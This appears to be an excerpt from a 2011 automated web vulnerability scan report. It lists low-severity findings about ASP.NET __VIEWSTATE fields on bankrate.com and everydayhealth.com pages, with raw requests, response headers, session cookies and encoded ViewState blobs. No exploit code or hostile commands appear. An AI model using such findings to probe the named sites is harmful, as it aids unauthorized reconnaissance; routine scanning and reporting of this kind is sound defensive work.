Path:   /funnel/mortgages/

Request

GET /funnel/mortgages/ HTTP/1.1
Host: www.bankrate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Servername: a-brmweb02
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 1.7.0
Content-Type: text/html; charset=utf-8
Expires: Thu, 05 May 2011 10:56:19 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Thu, 05 May 2011 10:56:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 46622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link type="text/css"
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTQxNTkyMzg4Mg9kFgJmD2QWAgIID2QWBAIWD2QWAgIBD2QWCGYPZBYCZg9kFgQCAQ9kFgJmD2QWBmYPEGQQFTQMU2VsZWN0IFN0YXRlB0FsYWJhbWEGQWxhc2thB0FyaXpvbmEIQXJrYW5zYXMKQ2FsaWZvcm5pYQhDb2xvcmFkbwtDb25uZWN0aWN1dAhEZWxhd2FyZRREaXN0cmljdCBvZiBDb2x1bWJpYQdGbG9yaWRhB0dlb3JnaWEGSGF3YWlpBUlkYWhvCElsbGlub2lzB0luZGlhbmEESW93YQZLYW5zYXMIS2VudHVja3kJTG91aXNpYW5hBU1haW5lCE1hcnlsYW5kDU1hc3NhY2h1c2V0dHMITWljaGlnYW4JTWlubmVzb3RhC01pc3Npc3NpcHBpCE1pc3NvdXJpB01vbnRhbmEITmVicmFza2EGTmV2YWRhDU5ldyBIYW1wc2hpcmUKTmV3IEplcnNleQpOZXcgTWV4aWNvCE5ldyBZb3JrDk5vcnRoIENhcm9saW5hDE5vcnRoIERha290YQRPaGlvCE9rbGFob21hBk9yZWdvbgxQZW5uc3lsdmFuaWEMUmhvZGUgSXNsYW5kDlNvdXRoIENhcm9saW5hDFNvdXRoIERha290YQlUZW5uZXNzZWUFVGV4YXMEVXRhaAdWZXJtb250CFZpcmdpbmlhCldhc2hpbmd0b24NV2VzdCBWaXJnaW5pYQlXaXNjb25zaW4HV3lvbWluZxU0AAJBTAJBSwJBWgJBUgJDQQJDTwJDVAJERQJEQwJGTAJHQQJISQJJRAJJTAJJTgJJQQJLUwJLWQJMQQJNRQJNRAJNQQJNSQJNTgJNUwJNTwJNVAJORQJOVgJOSAJOSgJOTQJOWQJOQwJORAJPSAJPSwJPUgJQQQJSSQJTQwJTRAJUTgJUWAJVVAJWVAJWQQJXQQJXVgJXSQJXWRQrAzRnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCAg8WAh4Fc3R5bGUFDmRpc3BsYXk6IG5vbmU7ZAIDDxYCHwAFDmRpc3BsYXk6IG5vbmU7ZAICD2QWAmYPZBYEZg8PZBYCHgdvbmtleXVwBZABWmlwQ29kZVNlbGVjdG9yLkNoZWNrWmlwQ29kZSh0aGlzLnZhbHVlLCQoJ2N0bDAwX3dlbGxfTW9ydGdhZ2VGdW5uZWxTdGFydF9TdGF0ZUNpdHlaaXBTZWxlY3Rvcl9TdGF0ZUNpdHlaaXBUYWJzX1ppcFRhYl9aaXBDb2RlU2VsZWN0b3JfY3RsMDAnKSk7ZAIBDxYCHwAFDmRpc3BsYXk6IG5vbmU7ZAIBDw8WAh4EVGV4dAUGMTY1MDAwZGQCAw8QZGQWAWZkAgQPD2QWAh4Hb25jbGljawVMJCgnYXNwbmV0Rm9ybScpLm9uc3VibWl0PWZ1bmN0aW9uKCl7cmV0dXJuIE1vcnRnYWdlU3RhcnQuVmFsaWRhdGVVcGRhdGUoKTt9O2QCHA9kFgJmD2QWAgIBD2QWAgIBDxYCHwIF2wkNCiA8IS0tIEJsdWVrYWkgUHJvdmlkZXIgVGFncyAtLT4NCiA8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4NCgkgaWYgKHR5cGVvZihQYWdlTWFuYWdlcikgIT0gInVuZGVmaW5lZCIgICYmIFBhZ2VNYW5hZ2VyIT1udWxsICYmIFBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YSE9bnVsbCkNCgkJew0KCQkgdmFyIHBhckxpc3Q9IiI7DQoJCSB2YXIgZXhjTGlzdD0iIjsNCgkJICBpZiAoIVBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YS5Db250YWluc0tleSgnQmx1ZUthaVBhcmEnKSkNCgkJCVBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YS5BZGQoJ0JsdWVLYWlQYXJhJywnTG9jYXRpb24sS2V5d29yZHMsQ2F0ZWdvcnknKTsNCg0KCQkgcGFyTGlzdD0gUGFnZU1hbmFnZXIuUGFnZU1ldGFEYXRhLlZhbHVlc1snQmx1ZUthaVBhcmEnXS5zcGxpdCgiLCIpOw0KCQkgZm9yKHZhciBpPTA7IGk8cGFyTGlzdC5sZW5ndGg7IGkrKykNCgkJCXsNCgkJCQkgaWYgKFBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YS5Db250YWluc0tleShwYXJMaXN0W2ldKSkNCgkJCQkJCXsNCgkJCQkJCQkgYmtfYWRkUGFnZUN0eChwYXJMaXN0W2ldLFBhZ2VNYW5hZ2VyLlBhZ2VNZXRhRGF0YS5WYWx1ZXNbcGFyTGlzdFtpXV0pOw0KCQkJCQkJfQ0KCQkJfSANCgkJCQ0KCQl9DQoJIGlmKCFJc051bGxvclVuZGVmaW5lZChDb29raWVNYW5hZ2VyKSAmJiAhSXNOdWxsb3JVbmRlZmluZWQoQ29va2llTWFuYWdlci5PcGVuKCdicm1iaycpLkdldCgnQktVRCcpKSkgDQoJCXsNCgkJIHZhciB1c2VydmFsPUNvb2tpZU1hbmFnZXIuT3BlbignYnJtYmsnKS5HZXQoJ0JLVUQnKTsNCgkJIGZvcih2YXIgaT0wOyBpPCB1c2VydmFsLnNwbGl0KCcsJykubGVuZ3RoIDsgaSsrKQ0KCQkJCSB7DQoJCQkJICAgaWYodXNlcnZhbC5zcGxpdCgnLCcpW2ldLnNwbGl0KCc6JykubGVuZ3RoID4gMSAmJiAoSXNOdWxsb3JVbmRlZmluZWQoZXhjTGlzdCkgfHwgZXhjTGlzdC5zcGxpdCgnLCcpLmluZGV4T2YodXNlcnZhbC5zcGxpdCgnLCcpW2ldLnNwbGl0KCc6JylbMF0pIDwgMCApKQ0KCQkJCQkJCSBia19hZGRVc2VyQ3R4KHVzZXJ2YWwuc3BsaXQoJywnKVtpXS5zcGxpdCgnOicpWzBdLHVzZXJ2YWwuc3BsaXQoJywnKVtpXS5zcGxpdCgnOicpWzFdKTsNCgkJCSB9DQoJCQkgQ29va2llTWFuYWdlci5EZWxldGUoJ2JybWJrJyk7DQoJCX0NCgkgYmtfZG9KU1RhZygyMzExLCA0KTsNCgkgPC9zY3JpcHQ+DQo8IS0tIEVuZCBCbHVla2FpIFRhZ3MgLS0+ZGQ=" />
...[SNIP]...

9.2. http://www.everydayhealth.com/allergy/climate-change-and-allergies.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /allergy/climate-change-and-allergies.aspx

Request

GET /allergy/climate-change-and-allergies.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:31 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO4hyeM5MDY2ODIwZC0xMWZhLTRjODktOGQzNS03NzFlZGNmNzhkODY1; expires=Wed, 13-Jul-2011 21:36:31 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ahsac155xnki2v55pzjexlmb; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49105


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Can Climate Change Cause Allergy? - Allergy Center - Every
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAX7Bg0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSJDYW4gQ2xpbWF0ZSBDaGFuZ2UgQ2F1c2UgQWxsZXJneT8gLSBBbGxlcmd5IENlbnRlciAtIEV2ZXJ5ZGF5IEhlYWx0aCIvPg0KPG1ldGEgcHJvcGVydHk9Im9nOmRlc2NyaXB0aW9uIiAgcnVuYXQ9InNlcnZlciIgIGlkPSJmYmRlc2NyaXB0aW9uIiBjb250ZW50PSJHbG9iYWwgd2FybWluZyBjb3VsZCBiZSBhZ2dyYXZhdGluZyB5b3VyIGFsbGVyZ2llcy4gR2V0IGFkdmljZSBvbiBob3cgdG8gZWFzZSBzeW1wdG9tcyBhbmQgY2FyZSBmb3IgYWxsZXJnaWVzIGluIHRvZGF5J3MgZW52aXJvbm1lbnQgYXQgRXZlcnlkYXkgSGVhbHRoLiIgPg0KPG1ldGEgcHJvcGVydHk9Im9nOnR5cGUiIGNvbnRlbnQ9ImFydGljbGUiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6aW1hZ2UiIGNvbnRlbnQ9Imh0dHA6Ly9pbWFnZXMuYWdvcmFtZWRpYS5jb20vZXZlcnlkYXloZWFsdGgvZ2Ntcy9sb2dvX2VoXzUweDUwLmdpZiIgLz4NCjxtZXRhIHByb3BlcnR5PSJvZzpzaXRlX25hbWUiIGNvbnRlbnQ9IkV2ZXJ5ZGF5SGVhbHRoLmNvbSIvPg0KPG1ldGEgcHJvcGVydHk9ImZiOmFwcF9pZCIgY29udGVudD0iMTM1MzQ2MDM2NDkwMTg2Ii8+DQo8bWV0YSBwcm9wZXJ0eT0iZmI6YWRtaW5zIiBjb250ZW50PSIiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6dXJsIiBydW5hdD0ic2VydmVyIiBpZD0iZmJ1cmwiIGNvbnRlbnQ9Imh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2FsbGVyZ3kvY2xpbWF0ZS1jaGFuZ2UtYW5kLWFsbGVyZ2llcy5hc3B4IiAvPg0KDQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJodHRwOi8vY29ubmVjdC5mYWNlYm9vay5uZXQvZW5fVVMvYWxsLmpzI3hmYm1sPTEiPjwvc2NyaXB0PmQCAw9kFgICAQ9kFgICAg9kFghmD2QWBGYPDxYCHgdWaXNpYmxlaGRkAgEPZBYCAgEPZBYCZg8PFgQeCENzc0NsYXNzBQp2ZXJ0aWNhbGFkHgRfIVNCAgJkZAICD2QWAgIBD2QWBAIBDw8WAh8ABQ5OZXh0IEFydGljbGU6IGRkAgMPFgIeC18hSXRlbUNvdW50AgEWAmYPZBYCAgEPDxYCHgtOYXZpZ2F0ZVVybAVaaHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vaGVhbHRoeS1saXZpbmcvMDIyNS9nbG9iYWwtd2FybWluZy1tYXktcG9zZS1kZWF0aC1yaXNrcy5hc3B4ZBYCZg8VASdHbG9iYWwgICBXYXJtaW5nICBNYXkgUG9zZSBIZWFsdGggUmlza3NkAgMPZBYGAgEPZBYEAgEPDxYCHwAFHVJlbGF0ZWQgQXJ0aWNsZXMgb24gQWxsZXJnaWVzZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFWmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hlYWx0aHktbGl2aW5nLzAyMjUvZ2xvYmFsLXdhcm1pbmctbWF5LXBvc2UtZGVhdGgtcmlza3MuYXNweGQWAmYPFQEnR2xvYmFsICAgV2FybWluZyAgTWF5IFBvc2UgSGVhbHRoIFJpc2tzZAIBD2QWAgIBDw8WAh8FBVlodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9hbGxlcmdpZXMvc3BlY2lhbGlzdHMvaG93LWRvLWktdGVzdC1mb3ItZm9vZC1hbGxlcmdpZXMuYXNweGQWAmYPFQEjSG93IERvIEkgVGVzdCBGb3IgRm9vZCAgQWxsZXJnaWVzID9kAgIPZBYCAgEPDxYCHwUFQmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2FsbGVyZ2llcy9hbGxlcmd5LWJsb29kLXRlc3RpbmcuYXNweGQWAmYPFQEcQmxvb2QgVGVzdGluZyBGb3IgIEFsbGVyZ2llc2QCAg9kFgQCAQ8PFgIfAAUbTW9yZSBvbiBBbGxlcmd5IE1lZGljYXRpb25zZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFMWh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2xpcXVpLWFsbGVyZ3lkFgJmDxUBDkxpcXVpLSBBbGxlcmd5ZAIBD2QWAgIBDw8WAh8FBTNodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9kcnVncy9kYXlxdWlsLWFsbGVyZ3lkFgJmDxUBEERheXF1aWwgIEFsbGVyZ3lkAgIPZBYCAgEPDxYCHwUFNGh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2JlbmFkcnlsLWFsbGVyZ3lkFgJmDxUBEUJlbmFkcnlsICBBbGxlcmd5ZAIDD2QWBAIBDw8WAh8ABRtBc2sgYSBQaGFybWFjaXN0OiBBbGxlcmdpZXNkZAIDDxYCHwQCAxYGZg9kFgICAQ8PFgIfBQV4aHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vaGVhbHRoLXF1ZXN0aW9ucy9kaXVyZXRpY3Mvd2hpY2gtZGl1cmV0aWNzLWNhbi15b3UtdGFrZS1pZi15b3UtYXJlLWFsbGVyZ2ljLXRvLXN1bGZhLWRydWdzZBYCZg8VAUBXaGljaCBEaXVyZXRpY3MgQ2FuIFlvdSBUYWtlIElmIFlvdSBBcmUgQWxsZXJnaWMgVG8gU3VsZmEgRHJ1Z3M/ZAIBD2QWAgIBDw8WAh8FBWxodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL2NhZmZlaW5lL3doYXQtYXJlLXNvbWUtb2YtdGhlLWFsbGVyZ2ljLXN5bXB0b21zLWZyb20tY2FmZmVpbmVkFgJmDxUBNVdoYXQgQXJlIFNvbWUgT2YgVGhlIEFsbGVyZ2ljIFN5bXB0b21zIEZyb20gQ2FmZmVpbmU/ZAICD2QWAgIBDw8WAh8FBW9odHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL2FzdGVwcm8vY2FuLWFzdGVwcm8td2VpZ2h0LWdhaW4tY2FuLXNpbmd1bGFpci1jYXVzZS13ZWlyZC1kcmVhbXNkFgJmDxUBOkNhbiBBc3RlcHJvIFdlaWdodCBHYWluPyBDYW4gU2luZ3VsYWlyIENhdXNlIFdlaXJkIERyZWFtcz9kAgcPZBYCAgEPZBYCAgIPDxYCHwFoZGRk" />
...[SNIP]...

9.3. http://www.everydayhealth.com/heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx

Request

GET /heart-disease/cholesterol/drug-treatments-for-high-cholesterol.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO6Y*xNkN2I5MjVjYi05YzUzLTRhY2MtYjcwOC03ZmQxMjAzMTMxNGU1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=esw2jyaebe5e2r55rhgfig45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 49627


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   Is Cholesterol Treatment Worth It? - EverydayHealth.com
<
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAWGBw0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSJJcyBDaG9sZXN0ZXJvbCBUcmVhdG1lbnQgV29ydGggSXQ/IC0gRXZlcnlkYXlIZWFsdGguY29tIi8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6ZGVzY3JpcHRpb24iICBydW5hdD0ic2VydmVyIiAgaWQ9ImZiZGVzY3JpcHRpb24iIGNvbnRlbnQ9Ik1lZGljYXRpb25zLCBkaWV0LCBleGVyY2lzZSwgb3IgYWxsIHRocmVlIGNhbiB1c3VhbGx5IG1hbmFnZSBjaG9sZXN0ZXJvbC4gU28gaWYgZGlldCBhbmQgZXhlcmNpc2UgY2FuIGxvd2VyIGhpZ2ggY2hvbGVzdGVyb2wsIGlzIG1lZGljYXRpb24gbmVjZXNzYXJ5PyIgPg0KPG1ldGEgcHJvcGVydHk9Im9nOnR5cGUiIGNvbnRlbnQ9ImFydGljbGUiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6aW1hZ2UiIGNvbnRlbnQ9Imh0dHA6Ly9pbWFnZXMuYWdvcmFtZWRpYS5jb20vZXZlcnlkYXloZWFsdGgvZ2Ntcy9sb2dvX2VoXzUweDUwLmdpZiIgLz4NCjxtZXRhIHByb3BlcnR5PSJvZzpzaXRlX25hbWUiIGNvbnRlbnQ9IkV2ZXJ5ZGF5SGVhbHRoLmNvbSIvPg0KPG1ldGEgcHJvcGVydHk9ImZiOmFwcF9pZCIgY29udGVudD0iMTM1MzQ2MDM2NDkwMTg2Ii8+DQo8bWV0YSBwcm9wZXJ0eT0iZmI6YWRtaW5zIiBjb250ZW50PSIiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6dXJsIiBydW5hdD0ic2VydmVyIiBpZD0iZmJ1cmwiIGNvbnRlbnQ9Imh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hlYXJ0LWRpc2Vhc2UvY2hvbGVzdGVyb2wvZHJ1Zy10cmVhdG1lbnRzLWZvci1oaWdoLWNob2xlc3Rlcm9sLmFzcHgiIC8+DQoNCjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBzcmM9Imh0dHA6Ly9jb25uZWN0LmZhY2Vib29rLm5ldC9lbl9VUy9hbGwuanMjeGZibWw9MSI+PC9zY3JpcHQ+ZAIDD2QWAgIBD2QWAgICD2QWCGYPZBYEZg8PFgIeB1Zpc2libGVoZGQCAQ9kFgICAQ9kFgJmDw8WBB4IQ3NzQ2xhc3MFCnZlcnRpY2FsYWQeBF8hU0ICAmRkAgIPZBYCAgEPZBYEAgEPDxYCHwAFDk5leHQgQXJ0aWNsZTogZGQCAw8WAh4LXyFJdGVtQ291bnQCARYCZg9kFgICAQ8PFgIeC05hdmlnYXRlVXJsBU5odHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oaWdoLWNob2xlc3Rlcm9sL2hpZ2gtY2hvbGVzdGVyb2wtdHJlYXRtZW50LmFzcHhkFgJmDxUBHkhpZ2ggICBDaG9sZXN0ZXJvbCAgIFRyZWF0bWVudGQCAw9kFgYCAg9kFgQCAQ8PFgIfAAUkUmVsYXRlZCBBcnRpY2xlcyBvbiBIaWdoIENob2xlc3Rlcm9sZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFTmh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hpZ2gtY2hvbGVzdGVyb2wvaGlnaC1jaG9sZXN0ZXJvbC10cmVhdG1lbnQuYXNweGQWAmYPFQEeSGlnaCAgIENob2xlc3Rlcm9sICAgVHJlYXRtZW50ZAIBD2QWAgIBDw8WAh8FBVpodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFydC1kaXNlYXNlL2Nob2xlc3Rlcm9sL3Rha2luZy1hbi1pbmRpdmlkdWFsLWFwcHJvYWNoLmFzcHhkFgJmDxUBN1doeSAgQ2hvbGVzdGVyb2wgICBUcmVhdG1lbnQgIElzIERpZmZlcmVudCBGb3IgRXZlcnlvbmVkAgIPZBYCAgEPDxYCHwUFV2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hlYWx0aC1jZW50ZXIvaGlnaC1jaG9sZXN0ZXJvbC1zaG91bGQtaS10YWtlLXN0YXRpbnMuYXNweGQWAmYPFQEtSGlnaCAgIENob2xlc3Rlcm9sIDogU2hvdWxkIEkgVGFrZSAgU3RhdGlucyA/ZAIDD2QWBAIBDw8WAh8ABR9Nb3JlIG9uIENob2xlc3Rlcm9sIE1lZGljYXRpb25zZGQCAw8WAh8EAgMWBmYPZBYCAgEPDxYCHwUFK2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL2xpcGl0b3JkFgJmDxUBB0xpcGl0b3JkAgEPZBYCAgEPDxYCHwUFKWh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2RydWdzL3pldGlhZBYCZg8VAQVaZXRpYWQCAg9kFgICAQ8PFgIfBQU2aHR0cDovL3d3dy5ldmVyeWRheWhlYWx0aC5jb20vZHJ1Z3MvY29lbnp5bWUtcTEwLWNvcTEwZBYCZg8VARRDb2VuenltZSBRMTAgKENvcTEwKWQCBA9kFgQCAQ8PFgIfAAUiQXNrIGEgUGhhcm1hY2lzdDogSGlnaCBDaG9sZXN0ZXJvbGRkAgMPFgIfBAIDFgZmD2QWAgIBDw8WAh8FBX9odHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL25pZ2h0bWFyZXMvaS1oYXZlLXRha2VuLWxpcGl0b3ItYXRlbm9sb2wtc3RhdGlucy1hbmQtcHJvemFjLWZvci15ZWFycy1hcy13ZWxsLWFzZBYCZg8VAWFJIEhhdmUgVGFrZW4gTGlwaXRvciwgQXRlbm9sb2wsICBTdGF0aW5zICwgQW5kIFByb3phYyBGb3IgWWVhcnMsIEFzIFdlbGwgQXMgVml0YW1pbiBEIEFuZCBDYWxjaXVtZAIBD2QWAgIBDw8WAh8FBW5odHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9oZWFsdGgtcXVlc3Rpb25zL2NhcmRpemVtL2lzLWNhcmRpemVtLXRoZS1iZXN0LW1lZGljYXRvbi1mb3ItYXRyaWFsLWZpYnJpbGxhdGlvbmQWAmYPFQE3SXMgQ2FyZGl6ZW0gVGhlIEJlc3QgTWVkaWNhdG9uIEZvciBBdHJpYWwgRmlicmlsbGF0aW9uP2QCAg9kFgICAQ8PFgIfBQWBAWh0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2hlYWx0aC1xdWVzdGlvbnMvc3RvbWFjaC11cHNldC93aGljaC1vZi10aGVzZS1tZWRpY2F0aW9ucy1pcy1jYXVzaW5nLW15LXN0b21hY2gtcHJvYmxlbXMtbGlzaW5vcHJpbGQWAmYPFQFqV2hpY2ggT2YgVGhlc2UgTWVkaWNhdGlvbnMgSXMgQ2F1c2luZyBNeSBTdG9tYWNoIFByb2JsZW1zLCBMaXNpbm9wcmlsLCBNZXRmb3JtaW4sIFByYXZhc3RhdGluLCBPciBBc3BpcmluP2QCBw9kFgICAQ9kFgICAg8PFgIfAWhkZGQ=" />
...[SNIP]...

9.4. http://www.everydayhealth.com/kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.everydayhealth.com
Path:   /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx

Request

GET /kids-health/0504/tvs-common-in-daycare-centers-flouting-guidelines.aspx HTTP/1.1
Host: www.everydayhealth.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:56:32 GMT
Server: Microsoft-IIS/6.0
ServerID: : USNJWWEB11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=AcxBpO7eIwsxNDRhNTExOC0xODcxLTQwN2ItYmNjOS1kZDk5OTdlYTE1N2I1; expires=Wed, 13-Jul-2011 21:36:32 GMT; path=/
Set-Cookie: ASP.NET_SessionId=ytmqve451nrbiy55ltp0oe55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48908


<!DOCTYPE html>

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">

<head id="head"><title>
   TVs Common in Daycare Centers Despite Guidelines - Kids' H
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTMwOTUyNTA1MQ9kFgQCAQ9kFgICBA8WAh4EVGV4dAWGCA0KPG1ldGEgcHJvcGVydHk9Im9nOnRpdGxlIiBjb250ZW50PSJUVnMgQ29tbW9uIGluIERheWNhcmUgQ2VudGVycyBEZXNwaXRlIEd1aWRlbGluZXMgLSBLaWRzJyBIZWFsdGggQ2VudGVyIC0gRXZlcnlkYXkgSGVhbHRoIi8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6ZGVzY3JpcHRpb24iICBydW5hdD0ic2VydmVyIiAgaWQ9ImZiZGVzY3JpcHRpb24iIGNvbnRlbnQ9Ik1vcmUgdGhhbiB0d28tdGhpcmRzIG9mIGRheWNhcmUgY2VudGVycyBpbmNsdWRlZCBpbiBhIG5ldyBVLlMuIHN0dWR5IGhhdmUgVFZzIGF2YWlsYWJsZSBmb3IgY2hpbGRyZW4gdG8gd2F0Y2gsIGFuZCBuZWFybHkgNjAgcGVyY2VudCBvZiB0aGUgY2VudGVycyBpZ25vcmVkIHRoZSBBbWVyaWNhbiBBY2FkZW15IG9mIFBlZGlhdHJpY3MnIGd1aWRlbGluZXMgZm9yIHRlbGV2aXNpb24gZXhwb3N1cmUgaW4geW91bmcga2lkcy4iID4NCjxtZXRhIHByb3BlcnR5PSJvZzp0eXBlIiBjb250ZW50PSJhcnRpY2xlIiAvPg0KPG1ldGEgcHJvcGVydHk9Im9nOmltYWdlIiBjb250ZW50PSJodHRwOi8vaW1hZ2VzLmFnb3JhbWVkaWEuY29tL2V2ZXJ5ZGF5aGVhbHRoL2djbXMvbG9nb19laF81MHg1MC5naWYiIC8+DQo8bWV0YSBwcm9wZXJ0eT0ib2c6c2l0ZV9uYW1lIiBjb250ZW50PSJFdmVyeWRheUhlYWx0aC5jb20iLz4NCjxtZXRhIHByb3BlcnR5PSJmYjphcHBfaWQiIGNvbnRlbnQ9IjEzNTM0NjAzNjQ5MDE4NiIvPg0KPG1ldGEgcHJvcGVydHk9ImZiOmFkbWlucyIgY29udGVudD0iIiAvPg0KPG1ldGEgcHJvcGVydHk9Im9nOnVybCIgcnVuYXQ9InNlcnZlciIgaWQ9ImZidXJsIiBjb250ZW50PSJodHRwOi8vd3d3LmV2ZXJ5ZGF5aGVhbHRoLmNvbS9raWRzLWhlYWx0aC8wNTA0L3R2cy1jb21tb24taW4tZGF5Y2FyZS1jZW50ZXJzLWZsb3V0aW5nLWd1aWRlbGluZXMuYXNweCIgLz4NCg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cDovL2Nvbm5lY3QuZmFjZWJvb2submV0L2VuX1VTL2FsbC5qcyN4ZmJtbD0xIj48L3NjcmlwdD5kAgMPZBYCAgEPZBYCAgIPZBYIZg9kFgRmDw8WAh4HVmlzaWJsZWhkZAIBD2QWAgIBD2QWAmYPDxYEHghDc3NDbGFzcwUKdmVydGljYWxhZB4EXyFTQgICZGQCAg9kFgICAQ9kFgQCAQ8PFgIfAAUOTmV4dCBBcnRpY2xlOiBkZAIDDxYCHgtfIUl0ZW1Db3VudAIBFgJmD2QWAgIBDw8WAh4LTmF2aWdhdGVVcmwFQ2h0dHA6Ly93d3cuZXZlcnlkYXloZWFsdGguY29tL2tpZHMtaGVhbHRoL3RvZGRsZXJzLWFuZC1zaGFyaW5nLmFzcHhkFgJmDxUBHFRlYWNoaW5nICBUb2RkbGVycyAgVG8gU2hhcmVkAgMPZBYCAgEPZBYEAgEPDxYCHwAFIFJlbGF0ZWQgQXJ0aWNsZXMgb24gS2lkcycgSGVhbHRoZGQCAw8WAh8EAgMWB